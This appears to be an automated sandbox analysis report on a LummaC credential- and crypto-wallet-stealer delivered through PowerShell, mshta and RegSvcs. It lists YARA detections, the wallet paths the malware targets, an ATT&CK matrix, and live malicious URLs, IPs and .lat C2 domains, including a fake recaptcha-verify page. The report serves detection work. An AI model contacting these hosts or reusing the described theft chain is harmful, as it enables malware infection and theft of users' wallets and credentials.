Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $eq4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $eq1C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: powershell.exe, 00000000.00000002.2063528385.00007FF8490D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Jump to behavior

Source: Yara match	File source: 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7296, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	321 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	212 Process Injection	21 Deobfuscate/Decode Files or Information	LSASS Memory	224 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	Security Account Manager	431 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	341 Virtualization/Sandbox Evasion	SSH	3 Clipboard Data	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	341 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	212 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
00.ps1	0%	Virustotal		Browse
00.ps1	0%	ReversingLabs

Source	Detection	Scanner	Label
https://view-reserve.com/recaptcha-verify.htmlLMEM	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlp-	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmld	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla	0%	Avira URL Cloud	safe
http://92.255.57.112/1/3.png	100%	Avira URL Cloud	malware
https://view-reserve.com/recaptcha-verify.htmlL	0%	Avira URL Cloud	safe
http://92.255.57.112/1/3.png$TC=$TC.replace(	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmly	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlK	0%	Avira URL Cloud	safe
curtainykeo.lat	100%	Avira URL Cloud	malware
https://view-reserve.com/recaptcha-verify.htmlB	0%	Avira URL Cloud	safe
http://92.255.57.112/1/2.pngX	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlU	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlX	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlINetCookies	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlH	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmleS	0%	Avira URL Cloud	safe
http://92.255.57.112	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.html8	0%	Avira URL Cloud	safe
http://92.255.57.112/1/2.png	100%	Avira URL Cloud	malware
http://92.255.H2	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmldJ	0%	Avira URL Cloud	safe
http://92.255.H	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlC:	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.html...	100%	Avira URL Cloud	malware
https://view-reserve.com/	0%	Avira URL Cloud	safe
http://92.255.57.112/1/1.pngX	0%	Avira URL Cloud	safe
http://92.255.57.112/1/3.pngX	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html	0%	Avira URL Cloud	safe
https://view-reserve.com/recaptcha-verify.html	100%	Avira URL Cloud	malware
http://92.255.Hr	0%	Avira URL Cloud	safe
http://92.255.57.112/1/1.png	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
view-reserve.com	92.255.57.120	true	true	unknown
washyceehsu.lat	unknown	unknown	true	unknown
kickykiduz.lat	unknown	unknown	true	unknown
bloodyswif.lat	unknown	unknown	true	unknown
savorraiykj.lat	unknown	unknown	true	unknown
miniatureyu.lat	unknown	unknown	true	unknown
curtainykeo.lat	unknown	unknown	true	unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false	high
finickypwk.lat	unknown	unknown	true	unknown
56.163.245.4.in-addr.arpa	unknown	unknown	false	high
shoefeatthe.lat	unknown	unknown	true	unknown
leggelatez.lat	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://92.255.57.112/1/3.png	true	Avira URL Cloud: malware	unknown
bloodyswif.lat	false		high
curtainykeo.lat	true	Avira URL Cloud: malware	unknown
leggelatez.lat	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
kickykiduz.lat	false		high
miniatureyu.lat	false		high
finickypwk.lat	false		high
shoefeatthe.lat	false		high
http://92.255.57.112/1/2.png	true	Avira URL Cloud: malware	unknown
washyceehsu.lat	false		high
savorraiykj.lat	false		high
https://view-reserve.com/recaptcha-verify.html	true	Avira URL Cloud: malware	unknown
http://92.255.57.112/1/1.png	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlLMEM	mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000004.00000003.2078790926.000001A4C4DE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false		high
https://www.gstatic.cn/recaptcha/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ugSp	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmld	mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmly	mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2060609253.000002793F61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2125339652.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla	mshta.exe, 00000003.00000003.2105602304.0000020E2CE9D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://view-reserve.com/recaptcha-verify.htmlL	mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://view-reserve.com/recaptcha-verify.htmlK	mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.112/1/3.png$TC=$TC.replace(	mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105797208.0000020E2CE99000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105602304.0000020E2CE96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105700897.0000020E2CE97000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlp-	mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106321743.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlB	mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlH	mshta.exe, 00000003.00000002.2139043663.000002062AB50000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000004.00000002.3291805384.000001A4C5000000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&a	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.112/1/2.pngX	powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sketchfab.com	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
